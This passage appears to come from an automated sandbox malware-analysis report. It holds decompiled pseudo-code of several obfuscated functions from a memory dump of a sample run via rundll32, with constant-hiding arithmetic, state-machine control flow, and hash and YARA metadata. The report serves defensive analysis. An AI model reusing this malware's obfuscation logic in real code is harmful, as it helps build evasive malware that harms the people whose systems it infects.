                                                                                                                    				_v16 = _v16 ^ 0x0000050c;
                                                                                                                    				_v68 = 0x910a11;
                                                                                                                    				_t171 = 0x13;
                                                                                                                    				_v68 = _v68 / _t171;
                                                                                                                    				_v68 = _v68 << 2;
                                                                                                                    				_v68 = _v68 + 0x13e3;
                                                                                                                    				_v68 = _v68 ^ 0x00184f98;
                                                                                                                    				_v32 = 0xaf4665;
                                                                                                                    				_t172 = 0x26;
                                                                                                                    				_v32 = _v32 * 0x1c;
                                                                                                                    				_v32 = _v32 ^ 0x13220c8d;
                                                                                                                    				_v56 = 0xf39368;
                                                                                                                    				_v56 = _v56 + 0xf012;
                                                                                                                    				_v56 = _v56 / _t172;
                                                                                                                    				_v56 = _v56 ^ 0x000d8e66;
                                                                                                                    				_v36 = 0xa121b7;
                                                                                                                    				_v36 = _v36 + 0x3186;
                                                                                                                    				_v36 = _v36 ^ 0x00aec580;
                                                                                                                    				_v72 = 0x8bd634;
                                                                                                                    				_t173 = 0x16;
                                                                                                                    				_v72 = _v72 / _t173;
                                                                                                                    				_v72 = _v72 | 0xc3992ef3;
                                                                                                                    				_v72 = _v72 + 0xf49;
                                                                                                                    				_v72 = _v72 ^ 0xc3912c07;
                                                                                                                    				_v24 = 0xbc86c6;
                                                                                                                    				_v24 = _v24 | 0x4f3bdf6c;
                                                                                                                    				_v24 = _v24 ^ 0x4fbb36fd;
                                                                                                                    				_v64 = 0xf11315;
                                                                                                                    				_v64 = _v64 | 0x791eed70;
                                                                                                                    				_v64 = _v64 + 0xffff781b;
                                                                                                                    				_v64 = _v64 | 0xb4748ed7;
                                                                                                                    				_v64 = _v64 ^ 0xfdf43fb6;
                                                                                                                    				_v28 = 0xa9ea5e;
                                                                                                                    				_v28 = _v28 << 9;
                                                                                                                    				_v28 = _v28 ^ 0x53d38433;
                                                                                                                    				_v44 = 0xab8ea7;
                                                                                                                    				_t174 = 0x5e;
                                                                                                                    				_v44 = _v44 / _t174;
                                                                                                                    				_v44 = _v44 >> 5;
                                                                                                                    				_v44 = _v44 ^ 0x00061aeb;
                                                                                                                    				_v48 = 0xf3254f;
                                                                                                                    				_v48 = _v48 + 0xffff7d1c;
                                                                                                                    				_v48 = _v48 ^ 0x338af708;
                                                                                                                    				_v48 = _v48 ^ 0x337c7814;
                                                                                                                    				_v60 = 0xe02c97;
                                                                                                                    				_v60 = _v60 * 0x4f;
                                                                                                                    				_v60 = _v60 + 0xffffa06e;
                                                                                                                    				_v60 = _v60 + 0x8165;
                                                                                                                    				_v60 = _v60 ^ 0x4522059f;
                                                                                                                    				_v52 = 0x13fe8b;
                                                                                                                    				_v52 = _v52 >> 6;
                                                                                                                    				_v52 = _v52 + 0xffffbd6d;
                                                                                                                    				_v52 = _v52 ^ 0x000eeb0b;
                                                                                                                    				_v20 = 0x7ee5fd;
                                                                                                                    				_v20 = _v20 | 0xb1050693;
                                                                                                                    				_v20 = _v20 ^ 0xb17ba1e4;
                                                                                                                    				do {
                                                                                                                    					while(_t177 != 0x29b5a10) {
                                                                                                                    						if(_t177 == 0x761c4cc) {
                                                                                                                    							_push(_t177);
                                                                                                                    							_t165 = E0033AE64(_v68, _t177, _a4, 0, _v56, _t177, _v36,  &_v12, _v40, _v72);
                                                                                                                    							_t200 =  &(_t200[0xa]);
                                                                                                                    							if(_t165 != 0) {
                                                                                                                    								_t177 = 0x29b5a10;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							if(_t177 == 0x762b00a) {
                                                                                                                    								_t177 = 0x761c4cc;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t177 != 0x7f1be9f) {
                                                                                                                    									goto L13;
                                                                                                                    								} else {
                                                                                                                    									_push(_t177);
                                                                                                                    									E0033AE64(_v44, _t177, _a4, _t197, _v60, _t177, _v52,  &_v12, _v16, _v20);
                                                                                                                    									 *_t196 = _v12;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L6:
                                                                                                                    						return _t197;
                                                                                                                    					}
                                                                                                                    					_push(_t177);
                                                                                                                    					_push(_t177);
                                                                                                                    					_t197 = E00337FF2(_v12);
                                                                                                                    					if(_t197 == 0) {
                                                                                                                    						_t177 = 0xc410c1b;
                                                                                                                    						goto L13;
                                                                                                                    					} else {
                                                                                                                    						_t177 = 0x7f1be9f;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					goto L6;
                                                                                                                    					L13:
                                                                                                                    				} while (_t177 != 0xc410c1b);
                                                                                                                    				goto L6;
                                                                                                                    			}
                                                                                                                    0x00000000
                                                                                                                    0x00334570
                                                                                                                    0x00334576
                                                                                                                    0x00000000
                                                                                                                    0x0033457c
                                                                                                                    0x0033457c
                                                                                                                    0x003345a1
                                                                                                                    0x003345ad
                                                                                                                    0x003345ad
                                                                                                                    0x00334576
                                                                                                                    0x0033456e
                                                                                                                    0x003345b0
                                                                                                                    0x003345b8
                                                                                                                    0x003345b8
                                                                                                                    0x00334606
                                                                                                                    0x00334607
                                                                                                                    0x0033460d
                                                                                                                    0x00334613
                                                                                                                    0x0033461f
                                                                                                                    0x00000000
                                                                                                                    0x00334615
                                                                                                                    0x00334615
                                                                                                                    0x00000000
                                                                                                                    0x00334615
                                                                                                                    0x00000000
                                                                                                                    0x00334624
                                                                                                                    0x00334624
                                                                                                                    0x00000000

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                    • Instruction ID: 7f9ef766aebe58adb19d9d918cc796fb907a8d3626d3ccab50509a21b4bae5ea
                                                                                                                    • Opcode Fuzzy Hash: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                    • Instruction Fuzzy Hash: 2D7133B2509341AFD359CF21C98982BBBF1EBD9718F10891DF29656260D3B2D949CF83
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E0034894B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                    				char _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				void* _t97;
                                                                                                                    				void* _t111;
                                                                                                                    				void* _t115;
                                                                                                                    				void* _t117;
                                                                                                                    				void* _t135;
                                                                                                                    				void* _t136;
                                                                                                                    				signed int _t137;
                                                                                                                    				signed int _t138;
                                                                                                                    				signed int _t139;
                                                                                                                    				signed int _t140;
                                                                                                                    				void* _t142;
                                                                                                                    				void* _t143;
                                                                                                                    
                                                                                                                    				_push(_a16);
                                                                                                                    				_t115 = __edx;
                                                                                                                    				_t135 = __ecx;
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t97);
                                                                                                                    				_v64 = 0x51cd23;
                                                                                                                    				_t143 = _t142 + 0x18;
                                                                                                                    				_t136 = 0;
                                                                                                                    				_t117 = 0x1f0121b;
                                                                                                                    				_t137 = 0x4d;
                                                                                                                    				_v64 = _v64 / _t137;
                                                                                                                    				_v64 = _v64 >> 9;
                                                                                                                    				_v64 = _v64 ^ 0x00032222;
                                                                                                                    				_v68 = 0xd4b8b7;
                                                                                                                    				_v68 = _v68 + 0xffffd2af;
                                                                                                                    				_v68 = _v68 ^ 0xd36e67b3;
                                                                                                                    				_v68 = _v68 ^ 0xd3b4aa1e;
                                                                                                                    				_v76 = 0x6efd74;
                                                                                                                    				_v76 = _v76 << 5;
                                                                                                                    				_v76 = _v76 ^ 0x2f6bad1f;
                                                                                                                    				_t138 = 0x34;
                                                                                                                    				_v76 = _v76 / _t138;
                                                                                                                    				_v76 = _v76 ^ 0x00af6c6b;
                                                                                                                    				_v52 = 0x9958c4;
                                                                                                                    				_v52 = _v52 + 0xffff4241;
                                                                                                                    				_v52 = _v52 ^ 0x009a50fc;
                                                                                                                    				_v56 = 0x2e84bf;
                                                                                                                    				_t139 = 0x72;
                                                                                                                    				_v56 = _v56 * 0x77;
                                                                                                                    				_v56 = _v56 ^ 0x15969b56;
                                                                                                                    				_v80 = 0x2bfbd3;
                                                                                                                    				_v80 = _v80 | 0xbb654ab5;
                                                                                                                    				_v80 = _v80 * 0x48;
                                                                                                                    				_v80 = _v80 >> 8;
                                                                                                                    				_v80 = _v80 ^ 0x00b72d27;
                                                                                                                    				_v60 = 0xb8f349;
                                                                                                                    				_v60 = _v60 / _t139;
                                                                                                                    				_v60 = _v60 ^ 0xcb885b35;
                                                                                                                    				_v60 = _v60 ^ 0xcb801a24;
                                                                                                                    				_v72 = 0xbf562d;
                                                                                                                    				_t140 = 0x42;
                                                                                                                    				_v72 = _v72 / _t140;
                                                                                                                    				_v72 = _v72 ^ 0xd5944d41;
                                                                                                                    				_v72 = _v72 ^ 0x4a8545c0;
                                                                                                                    				_v72 = _v72 ^ 0x9f1c34cb;
                                                                                                                    				_v48 = 0xda7c79;
                                                                                                                    				_v48 = _v48 << 0xc;
                                                                                                                    				_v48 = _v48 ^ 0xa7c49699;
                                                                                                                    				do {
                                                                                                                    					while(_t117 != 0x1f0121b) {
                                                                                                                    						if(_t117 == 0x20f75ec) {
                                                                                                                    							E00333DBC( &_v44, _t115, _v64, _v68, _v76);
                                                                                                                    							_t143 = _t143 + 0xc;
                                                                                                                    							_t117 = 0x98c428b;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t117 == 0x98c428b) {
                                                                                                                    								_t111 = E00332A21(_v52, _v56,  &_v44, _t135, _v80);
                                                                                                                    								_t143 = _t143 + 0xc;
                                                                                                                    								__eflags = _t111;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									_t117 = 0xea94eac;
                                                                                                                    									continue;
                                                                                                                    								}
                                                                                                                    							} else {
                                                                                                                    								_t149 = _t117 - 0xea94eac;
                                                                                                                    								if(_t117 != 0xea94eac) {
                                                                                                                    									goto L11;
                                                                                                                    								} else {
                                                                                                                    									E0034D97D( &_v44, _v60, _t149, _v72, _t135 + 4, _v48);
                                                                                                                    									_t136 =  !=  ? 1 : _t136;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L6:
                                                                                                                    						return _t136;
                                                                                                                    					}
                                                                                                                    					_t117 = 0x20f75ec;
                                                                                                                    					L11:
                                                                                                                    					__eflags = _t117 - 0x3544eb3;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				goto L6;
                                                                                                                    			}

























                                                                                                                    0x00348afb
                                                                                                                    0x00348afb
                                                                                                                    0x00348b45
                                                                                                                    0x00348b47
                                                                                                                    0x00348b47
                                                                                                                    0x00348b47
                                                                                                                    0x00000000

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E0034AC3A(void* __ecx) {
                                                                                                                    				signed int _v4;
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				void* _t82;
                                                                                                                    				signed int _t85;
                                                                                                                    				signed int _t86;
                                                                                                                    				void* _t88;
                                                                                                                    				void* _t96;
                                                                                                                    				void* _t97;
                                                                                                                    				signed int* _t99;
                                                                                                                    
                                                                                                                    				_t88 = __ecx;
                                                                                                                    				_t99 =  &_v28;
                                                                                                                    				_v24 = 0x5aa995;
                                                                                                                    				_v24 = _v24 | 0x25663b9c;
                                                                                                                    				_v24 = _v24 << 6;
                                                                                                                    				_t85 = 0x11;
                                                                                                                    				_v24 = _v24 / _t85;
                                                                                                                    				_t96 = 0;
                                                                                                                    				_v24 = _v24 ^ 0x05a97123;
                                                                                                                    				_t97 = 0xfe6f9f;
                                                                                                                    				_v16 = 0x9f09af;
                                                                                                                    				_v16 = _v16 + 0xcb37;
                                                                                                                    				_v16 = _v16 ^ 0x3a843722;
                                                                                                                    				_v16 = _v16 ^ 0x3a14bc19;
                                                                                                                    				_v28 = 0x7e93e4;
                                                                                                                    				_v28 = _v28 << 0xa;
                                                                                                                    				_t86 = 0x1a;
                                                                                                                    				_v28 = _v28 / _t86;
                                                                                                                    				_v28 = _v28 ^ 0x4056cd73;
                                                                                                                    				_v28 = _v28 ^ 0x49f3cf3d;
                                                                                                                    				_v4 = 0x47c602;
                                                                                                                    				_v4 = _v4 ^ 0xe3aa640e;
                                                                                                                    				_v4 = _v4 | 0xd85731ad;
                                                                                                                    				_v4 = _v4 ^ 0xfbf46e2b;
                                                                                                                    				_v8 = 0x201e29;
                                                                                                                    				_v8 = _v8 << 0x10;
                                                                                                                    				_v8 = _v8 * 0x48;
                                                                                                                    				_v8 = _v8 ^ 0x7b8200e2;
                                                                                                                    				_v12 = 0x18f9c1;
                                                                                                                    				_v12 = _v12 * 0x54;
                                                                                                                    				_v12 = _v12 << 6;
                                                                                                                    				_v12 = _v12 ^ 0x0c72dcb8;
                                                                                                                    				_v20 = 0xd6b502;
                                                                                                                    				_v20 = _v20 * 0x55;
                                                                                                                    				_v20 = _v20 << 0xd;
                                                                                                                    				_v20 = _v20 >> 0xb;
                                                                                                                    				_v20 = _v20 ^ 0x00034ef9;
                                                                                                                    				do {
                                                                                                                    					while(_t97 != 0xfe6f9f) {
                                                                                                                    						if(_t97 == 0x2f82a60) {
                                                                                                                    							_push(_t88);
                                                                                                                    							_push(_t88);
                                                                                                                    							_t82 = E0033474B();
                                                                                                                    							_t99 =  &(_t99[2]);
                                                                                                                    							_t97 = 0x6e030e4;
                                                                                                                    							_t96 = _t96 + _t82;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t97 != 0x6e030e4) {
                                                                                                                    								goto L8;
                                                                                                                    							} else {
                                                                                                                    								_t96 = _t96 + E0034C2F8(_v4, _t88 + 4, _v8, _v12, _v20);
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L5:
                                                                                                                    						return _t96;
                                                                                                                    					}
                                                                                                                    					_t97 = 0x2f82a60;
                                                                                                                    					L8:
                                                                                                                    				} while (_t97 != 0xea6061f);
                                                                                                                    				goto L5;
                                                                                                                    			}


















                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E00338969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				intOrPtr _v44;
                                                                                                                    				void* _t84;
                                                                                                                    				signed int _t99;
                                                                                                                    				signed int _t103;
                                                                                                                    				void* _t109;
                                                                                                                    				signed int _t110;
                                                                                                                    
                                                                                                                    				_push(_a8);
                                                                                                                    				_t109 = __edx;
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				E003420B9(_t84);
                                                                                                                    				_v40 = _v40 & 0x00000000;
                                                                                                                    				_v36 = _v36 & 0x00000000;
                                                                                                                    				_v44 = 0x779abe;
                                                                                                                    				_v20 = 0xb5573d;
                                                                                                                    				_v20 = _v20 ^ 0xbb0d078e;
                                                                                                                    				_t103 = 0x58;
                                                                                                                    				_v20 = _v20 * 0x30;
                                                                                                                    				_v20 = _v20 ^ 0x328c396d;
                                                                                                                    				_v16 = 0x362481;
                                                                                                                    				_v16 = _v16 + 0x16cb;
                                                                                                                    				_v16 = _v16 | 0xfe676eb4;
                                                                                                                    				_v16 = _v16 ^ 0xfe76a30b;
                                                                                                                    				_v32 = 0xc91798;
                                                                                                                    				_v32 = _v32 * 0x65;
                                                                                                                    				_v32 = _v32 ^ 0x4f59c84a;
                                                                                                                    				_v28 = 0xb97254;
                                                                                                                    				_v28 = _v28 / _t103;
                                                                                                                    				_v28 = _v28 ^ 0x000673a7;
                                                                                                                    				_v12 = 0xb6c56;
                                                                                                                    				_v12 = _v12 * 0x2a;
                                                                                                                    				_v12 = _v12 << 1;
                                                                                                                    				_v12 = _v12 * 0x5b;
                                                                                                                    				_v12 = _v12 ^ 0x5515a6e4;
                                                                                                                    				_v8 = 0x1f2e02;
                                                                                                                    				_v8 = _v8 * 0x66;
                                                                                                                    				_v8 = _v8 * 0x79;
                                                                                                                    				_v8 = _v8 + 0xffff535b;
                                                                                                                    				_v8 = _v8 ^ 0xdf3e36a5;
                                                                                                                    				_v24 = 0x692813;
                                                                                                                    				_v24 = _v24 >> 0xb;
                                                                                                                    				_v24 = _v24 + 0xffffcb9d;
                                                                                                                    				_v24 = _v24 ^ 0xfffb0f76;
                                                                                                                    				E0034D25E(_t103);
                                                                                                                    				_v16 = 0x87422f;
                                                                                                                    				_v16 = _v16 | 0xfc58150b;
                                                                                                                    				_v16 = _v16 ^ 0xfcdf572b;
                                                                                                                    				_v20 = 0xc6266d;
                                                                                                                    				_v20 = _v20 << 0xa;
                                                                                                                    				_v20 = _v20 + 0xffff7638;
                                                                                                                    				_v20 = _v20 ^ 0x18992a28;
                                                                                                                    				_t99 = E00340AE0(_v20, _v16);
                                                                                                                    				_push(_v24);
                                                                                                                    				_t110 = _t99;
                                                                                                                    				_push(_t109);
                                                                                                                    				_push(_t110);
                                                                                                                    				_push(1);
                                                                                                                    				E003380E3(_v12, _v8);
                                                                                                                    				 *((short*)(_t109 + _t110 * 2)) = 0;
                                                                                                                    				return 0;
                                                                                                                    			}



















                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                    • Instruction ID: 768090e9b12b91ad54b48b7034f04b0be1e5909d737540ea47e295f4fbf40231
                                                                                                                    • Opcode Fuzzy Hash: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                    • Instruction Fuzzy Hash: 6241CD75C0121AABCF18CFE5C98A9AEBFB0FB44314F108199E525AA260D3B95B45CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E0034DBEA(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				intOrPtr _v24;
                                                                                                                    				intOrPtr _v28;
                                                                                                                    				void* _t74;
                                                                                                                    				char* _t82;
                                                                                                                    				signed int _t84;
                                                                                                                    
                                                                                                                    				_push(_a12);
                                                                                                                    				_t82 = __edx;
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				E003420B9(_t74);
                                                                                                                    				_v20 = _v20 & 0x00000000;
                                                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                                                    				_v28 = 0x71ca23;
                                                                                                                    				_v24 = 0x57f692;
                                                                                                                    				_v12 = 0xd3252c;
                                                                                                                    				_v12 = _v12 + 0x4351;
                                                                                                                    				_v12 = _v12 + 0xffff5b79;
                                                                                                                    				_v12 = _v12 ^ 0x00d2c3f6;
                                                                                                                    				_v8 = 0xbb067e;
                                                                                                                    				_t84 = 0x11;
                                                                                                                    				_v8 = _v8 / _t84;
                                                                                                                    				_v8 = _v8 >> 8;
                                                                                                                    				_v8 = _v8 ^ 0xac5d3832;
                                                                                                                    				_v8 = _v8 ^ 0xac5d3334;
                                                                                                                    				_v8 = 0xab60c2;
                                                                                                                    				_v8 = _v8 << 0x10;
                                                                                                                    				_v8 = _v8 ^ 0x910d5570;
                                                                                                                    				_v8 = _v8 >> 4;
                                                                                                                    				_v8 = _v8 ^ 0x0f1cf547;
                                                                                                                    				if( *__edx != 0) {
                                                                                                                    					do {
                                                                                                                    						_v8 = 0xbb067e;
                                                                                                                    						_v8 = _v8 / _t84;
                                                                                                                    						_v8 = _v8 >> 8;
                                                                                                                    						_v8 = _v8 ^ 0xac5d3832;
                                                                                                                    						_v8 = _v8 ^ 0xac5d3334;
                                                                                                                    						_v8 = 0xab60c2;
                                                                                                                    						_v8 = _v8 << 0x10;
                                                                                                                    						_v8 = _v8 ^ 0x910d5570;
                                                                                                                    						_v8 = _v8 >> 4;
                                                                                                                    						_v8 = _v8 ^ 0x0f1cf547;
                                                                                                                    						_v12 =  *_t82;
                                                                                                                    						_v12 = _v12 + (_v12 << _v8);
                                                                                                                    						_v12 = _v12 + (_v12 << _v8);
                                                                                                                    						_v12 = _v12 - _v12;
                                                                                                                    						_t82 = _t82 + 1;
                                                                                                                    						_t84 = 0x11;
                                                                                                                    					} while ( *_t82 != 0);
                                                                                                                    				}
                                                                                                                    				return _v12;
                                                                                                                    			}













                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                    • Instruction ID: c2dada4561be5a11cc88119f9f2fddc93ed928f986c03fafae229e471cc7cde2
                                                                                                                    • Opcode Fuzzy Hash: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                    • Instruction Fuzzy Hash: BD31F075D02358EBDB06DFA8CA4A2DEBBF1EF44315F208099E501A7265D3B14B98EB40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E00339011(void* __ecx, signed int __edx) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				intOrPtr _v44;
                                                                                                                    				intOrPtr _t75;
                                                                                                                    				intOrPtr _t80;
                                                                                                                    				signed int _t88;
                                                                                                                    				signed int _t89;
                                                                                                                    
                                                                                                                    				_v40 = _v40 & 0x00000000;
                                                                                                                    				_v44 = 0xa2b624;
                                                                                                                    				_v8 = 0x99eb9;
                                                                                                                    				_t88 = __edx;
                                                                                                                    				_v8 = _v8 * 0x25;
                                                                                                                    				_v8 = _v8 | 0x30e9a4b5;
                                                                                                                    				_v8 = _v8 << 5;
                                                                                                                    				_v8 = _v8 ^ 0x3d7f3aa0;
                                                                                                                    				_v24 = 0x77b72d;
                                                                                                                    				_v24 = _v24 << 1;
                                                                                                                    				_v24 = _v24 ^ 0x00e56894;
                                                                                                                    				_v20 = 0x2ce6cf;
                                                                                                                    				_v20 = _v20 >> 6;
                                                                                                                    				_v20 = _v20 ^ 0x000f2bb3;
                                                                                                                    				_v32 = 0xab4cd;
                                                                                                                    				_v32 = _v32 >> 0xc;
                                                                                                                    				_v32 = _v32 ^ 0x0007aa85;
                                                                                                                    				_v28 = 0x1f3eea;
                                                                                                                    				_v28 = _v28 >> 9;
                                                                                                                    				_v28 = _v28 ^ 0x0004326d;
                                                                                                                    				_v12 = 0xc1e4f9;
                                                                                                                    				_v12 = _v12 ^ 0x329f08e7;
                                                                                                                    				_v12 = _v12 + 0xcc91;
                                                                                                                    				_v12 = _v12 >> 8;
                                                                                                                    				_v12 = _v12 ^ 0x0038f912;
                                                                                                                    				_v16 = 0x3b10d4;
                                                                                                                    				_t89 = 0x6f;
                                                                                                                    				_v16 = _v16 / _t89;
                                                                                                                    				_v16 = _v16 + 0xffff4357;
                                                                                                                    				_v16 = _v16 ^ 0xf8ba2c27;
                                                                                                                    				_v16 = _v16 ^ 0x074e6031;
                                                                                                                    				_v36 = 0x1364c3;
                                                                                                                    				_v36 = _v36 + 0x503c;
                                                                                                                    				_v36 = _v36 ^ 0x001cba9a;
                                                                                                                    				_push(_v20);
                                                                                                                    				_push(_v24);
                                                                                                                    				_t75 = E00345BFD(_v32, _v28, _v12, E0034DCF7(_v8, __ecx, _v36));
                                                                                                                    				_t80 =  *0x353df8; // 0x0
                                                                                                                    				 *((intOrPtr*)(_t80 + 4 + _t88 * 4)) = _t75;
                                                                                                                    				return E0033A8B0(_v16, _t74, _v36);
                                                                                                                    			}


















                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cf7847043af1de0d4382fa26af121303816e434008bcb4ae27398eae05750652
                                                                                                                    • Instruction ID: 8cadbab609d6c144148a833f84272ccbfbad687118674c05ee60cea996bf75f1
                                                                                                                    • Opcode Fuzzy Hash: cf7847043af1de0d4382fa26af121303816e434008bcb4ae27398eae05750652
                                                                                                                    • Instruction Fuzzy Hash: 5731F071D0021EEBCF49EFA5D94A4EEBBB1FF44318F208198D421B6250D7B90A59DF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00337FF2(void* __edx) {
                                                                                                                    				signed int _v8;
                                                                                                                    				unsigned int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				intOrPtr _v36;
                                                                                                                    				intOrPtr _v40;
                                                                                                                    				signed int _t67;
                                                                                                                    				void* _t73;
                                                                                                                    
                                                                                                                    				_v32 = _v32 & 0x00000000;
                                                                                                                    				_v40 = 0xdad9ef;
                                                                                                                    				_v36 = 0x9bb390;
                                                                                                                    				_v28 = 0x653306;
                                                                                                                    				_v28 = _v28 + 0xffff1628;
                                                                                                                    				_v28 = _v28 >> 3;
                                                                                                                    				_v28 = _v28 ^ 0x000c892d;
                                                                                                                    				_v12 = 0x5dd1e8;
                                                                                                                    				_v12 = _v12 ^ 0xb170c383;
